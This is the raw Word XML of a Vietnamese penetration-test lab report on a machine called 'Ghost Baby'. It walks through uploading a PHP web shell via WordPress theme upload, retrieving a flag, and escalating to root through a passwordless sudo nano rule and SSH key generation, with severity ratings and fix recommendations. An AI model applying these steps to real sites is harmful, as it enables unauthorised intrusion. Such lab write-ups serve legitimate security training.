                    <a:blip r:embed="rId15">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E0E1F4F" w14:textId="764A9963" w:rsidR="41F31F97" w:rsidRDefault="6E54753F" w:rsidP="41F31F97">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ở đây </w:t>
      </w:r>
      <w:r w:rsidR="31123488">
        <w:t>ta tiến hành upshell bằng php</w:t>
      </w:r>
      <w:r w:rsidR="510CC7F6">
        <w:t xml:space="preserve">. Tiến hành tìm kiếm cách upshell trên mạng thì ta tìm được cách upshell </w:t>
      </w:r>
      <w:r w:rsidR="31123488">
        <w:t xml:space="preserve"> thông qua các theme php trên wordpress.</w:t>
      </w:r>
      <w:r w:rsidR="0E91F83C">
        <w:t xml:space="preserve"> Và có luôn cả code cho file php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71DD81" w14:textId="70E4B11E" w:rsidR="5F6031F4" w:rsidRDefault="31123488" w:rsidP="6DF7E98A">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A7B76F0" wp14:editId="708E2C4F">
            <wp:extent cx="5816082" cy="3574467"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1673386092" name="Picture 16733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86092"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5816082" cy="3574467"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4F7A1" w14:textId="70E4B11E" w:rsidR="31123488" w:rsidRDefault="31123488" w:rsidP="4D6D463C">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ta chọn add new --&gt; chọn upload theme sau đó</w:t>
      </w:r>
      <w:r w:rsidR="2136170C">
        <w:t xml:space="preserve"> upload file code upshell.php chứa shell vừa tạo ở máy chúng ta. Sau đó install để upshell lên thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7316E6" w14:textId="70E4B11E" w:rsidR="2136170C" w:rsidRDefault="2136170C" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5450D5B2" wp14:editId="115D9D57">
            <wp:extent cx="6095998" cy="3784600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1710439915" name="Picture 17104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439915"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6095998" cy="3784600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4BD2FC" w14:textId="72DE4D2E" w:rsidR="5DEA8561" w:rsidRDefault="15A72F23" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:t xml:space="preserve">Tiếp theo kiểm tra ở thư mục /wp-content/uploads/2021/11 xem file chúng ta up đã có chưa nếu có thì </w:t>
      </w:r>
      <w:r w:rsidR="6E099A8C" w:rsidRPr="321E5494">
        <w:t>t mở nó lên bằng cách click vào nó nếu thành công thì shell sẽ hiện lên và đã thành công upshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEB885" w14:textId="55498375" w:rsidR="5DEA8561" w:rsidRDefault="6E099A8C" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4195B30F" wp14:editId="1D3462F4">
            <wp:extent cx="6066942" cy="821565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="855075045" name="Picture 8550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66942" cy="821565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7905EE" w14:textId="0E5E2C70" w:rsidR="5DEA8561" w:rsidRDefault="6E099A8C" w:rsidP="09C22888">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="201F6800" wp14:editId="56D7AF23">
            <wp:extent cx="4572000" cy="3000375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1727011929" name="Picture 17270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1745CA2" w14:textId="6CAB4B8F" w:rsidR="3CB93736" w:rsidRDefault="6E099A8C" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:t>Tiếp tục tìm file local.txt và mở lên ta sẽ có được flag của Ghost Baby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8DF14" w14:textId="6A004133" w:rsidR="3CB93736" w:rsidRDefault="6E099A8C" w:rsidP="3CB93736">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BEE766A" wp14:editId="691FD783">
            <wp:extent cx="5514975" cy="562987"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1607108333" name="Picture 160710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14975" cy="562987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18672048" w14:textId="043C9E51" w:rsidR="00EA28EC" w:rsidRDefault="00C366A5" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Hình ảnh minh chứng</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A9E09" w14:textId="3794EDD3" w:rsidR="00C366A5" w:rsidRPr="00C366A5" w:rsidRDefault="088C54A7" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FA8FA61" wp14:editId="1A92B9B1">
            <wp:extent cx="5489039" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61778479" name="Picture 6177847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9039" cy="2641600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABCE4E3" w14:textId="5F8F74CE" w:rsidR="00CC2A18" w:rsidRDefault="00C366A5" w:rsidP="6DF7E98A">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6DF7E98A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nội dung </w:t>
      </w:r>
      <w:r w:rsidR="0007091B" w:rsidRPr="6DF7E98A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tập tin </w:t>
      </w:r>
      <w:r w:rsidRPr="6DF7E98A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBAF097" w14:textId="06B2833C" w:rsidR="43413B85" w:rsidRDefault="43413B85" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="007C325D" wp14:editId="4128938D">
            <wp:extent cx="5553075" cy="485894"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1425701689" name="Picture 142570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53075" cy="485894"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D2EB" w14:textId="6D4F19EC" w:rsidR="00C366A5" w:rsidRDefault="00C366A5" w:rsidP="00C366A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="200" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc57241319"/>
      <w:r>
        <w:t>Leo thang đặc quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="1EDF8001" w14:textId="2EAFE943" w:rsidR="00C366A5" w:rsidRPr="00B6701C" w:rsidRDefault="00C366A5" w:rsidP="00C366A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Lỗ hổng đã khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2E823D07" w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Không cài đặt tài khoản vào root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6775A0B4" w14:textId="4CD2E5A4" w:rsidR="00C366A5" w:rsidRDefault="00C366A5" w:rsidP="321E5494">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Giải thích lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="38181C34" w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  Khi kiểm tra đặc quyền của người dùng, có thể xuất hiện một cách truy cập vào root mà không cần mật khẩu, do đó có thể sử dụng đặc quyền của root để tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E12097" w14:textId="0BABDCEE" w:rsidR="00C366A5" w:rsidRPr="00B74532" w:rsidRDefault="00C366A5" w:rsidP="00C366A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến nghị vá lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="6A8D2050" w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cung cấp mật khẩu để bảo vệ root toàn vẹn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC0736" w14:textId="2F3B0BF2" w:rsidR="00C366A5" w:rsidRPr="00F043C0" w:rsidRDefault="00C366A5" w:rsidP="00C366A5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mức độ ảnh hưởng: </w:t>
      </w:r>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Nghiêm trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC3E4D" w14:textId="77777777" w:rsidR="0007091B" w:rsidRDefault="0007091B" w:rsidP="0007091B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cách thức khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>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45"/>
      </w:tblGrid>
      <w:tr w:rsidR="0007091B" w14:paraId="79B25778" w14:textId="77777777" w:rsidTr="009E48EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="594F0D40" w14:textId="77777777" w:rsidR="0007091B" w:rsidRDefault="0007091B" w:rsidP="009E48EB">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>[Lệnh tấn công/mã khai thác]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48BC4510" w14:textId="77777777" w:rsidR="0007091B" w:rsidRPr="00691796" w:rsidRDefault="0007091B" w:rsidP="009E48EB">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve">[màu </w:t>
            </w:r>
            <w:r w:rsidRPr="00D11294">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>đỏ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve"> nếu có thay đổi trong mã khai thác]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BCB8D0C" w14:textId="0E965C99" w:rsidR="6A00B536" w:rsidRDefault="0007091B" w:rsidP="3774CDC1">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007091B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>[Step-by-step cách thức để có quyền truy cập vào máy chủ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD52CED" w14:textId="350C1D9F" w:rsidR="6A00B536" w:rsidRDefault="6A00B536" w:rsidP="3D168C39">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sử dụng sudo –l để kiểm tra đặc quyền của user </w:t>
      </w:r>
      <w:r w:rsidRPr="3D168C39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cnsc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E3D1C" w14:textId="1ABBA19B" w:rsidR="6A00B536" w:rsidRDefault="6A00B536" w:rsidP="5A2824A6">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EE2F253" wp14:editId="5DB7BA90">
            <wp:extent cx="4572000" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="832187012" name="Picture 186947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478382"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">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65C591EA" w14:textId="71E49B4F" w:rsidR="3D168C39" w:rsidRDefault="6A00B536" w:rsidP="3D168C39">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="7A687430">
        <w:t xml:space="preserve">Ta nhận thấy </w:t>
      </w:r>
      <w:r w:rsidRPr="7CD3295E">
        <w:t>khi sử dụng sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="7A687430">
        <w:t xml:space="preserve"> /bin/nano /opt/priv </w:t>
      </w:r>
      <w:r w:rsidRPr="7CD3295E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D0D93D7">
        <w:t>thì không</w:t>
      </w:r>
      <w:r w:rsidRPr="7A687430">
        <w:t xml:space="preserve"> cần mật khẩu</w:t>
      </w:r>
      <w:r w:rsidRPr="0D0D93D7">
        <w:t xml:space="preserve"> vẫn có thể vào được quyền root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E517222" w14:textId="70E4B11E" w:rsidR="53E2E30A" w:rsidRDefault="53E2E30A" w:rsidP="0D0D93D7">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0282C8AF">
        <w:t>Tuy nhiên ở trên shell không thể truy cập vào root</w:t>
      </w:r>
      <w:r w:rsidR="3701ED01" w:rsidRPr="5AF63F2A">
        <w:t>, do đó ta tạo</w:t>
      </w:r>
      <w:r w:rsidR="0E099C61" w:rsidRPr="5A37346E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4D7D05FC" w:rsidRPr="58306008">
        <w:t xml:space="preserve">một cặp khóa </w:t>
      </w:r>
      <w:r w:rsidR="4D7D05FC" w:rsidRPr="5EA7F3B9">
        <w:t xml:space="preserve">để kết nối thông qua ssh </w:t>
      </w:r>
      <w:r w:rsidR="4D7D05FC" w:rsidRPr="40F79C2A">
        <w:t>Tiến hành tạo cặp key rsa</w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="0FA5AB2E">
        <w:t xml:space="preserve"> cho quá trình xác thực bằng lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="0FA5AB2E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh-</w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="7FEC44EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">keygen </w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="558B63F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="7FEC44EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">t rsa </w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="558B63F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="7FEC44EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f /home/</w:t>
      </w:r>
      <w:r w:rsidR="7C272A3C" w:rsidRPr="558B63F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cnsc/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A4616" w14:textId="7A264402" w:rsidR="757FE6DF" w:rsidRDefault="336AA1B2" w:rsidP="7FEC44EE">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15122B47" wp14:editId="1A561854">
            <wp:extent cx="5734050" cy="2592268"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="406359703" name="Picture 406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4050" cy="2592268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582E53F" w14:textId="43A1640C" w:rsidR="7215FDEB" w:rsidRDefault="7215FDEB" w:rsidP="25205136">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="2597D452">
        <w:t>Kiểm tra thấy key nằm tại thư mục /home/cnsc/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD65CF9" w14:textId="649C627A" w:rsidR="7215FDEB" w:rsidRDefault="7215FDEB" w:rsidP="2597D452">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08FBADB2" wp14:editId="570D4A62">
            <wp:extent cx="5672667" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="632892347" name="Picture 63289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72667" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D79E763" w14:textId="78AB6A01" w:rsidR="7215FDEB" w:rsidRDefault="7215FDEB" w:rsidP="60D46F93">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="60D46F93">
        <w:t>Lúc này trong thư mục .ssh chứa hai khóa là id_rsa (khóa private) và id_rsa.pub (</w:t>
      </w:r>
      <w:r w:rsidRPr="5497098D">
        <w:t>khóa công khai)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F0DAB" w14:textId="28DF96C9" w:rsidR="7215FDEB" w:rsidRDefault="7215FDEB" w:rsidP="5497098D">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="327C6814" wp14:editId="66740A82">
            <wp:extent cx="3933825" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1275531640" name="Picture 3427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46487"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3933825" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="328905CE" w14:textId="771B93C5" w:rsidR="7215FDEB" w:rsidRDefault="7215FDEB" w:rsidP="5497098D">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
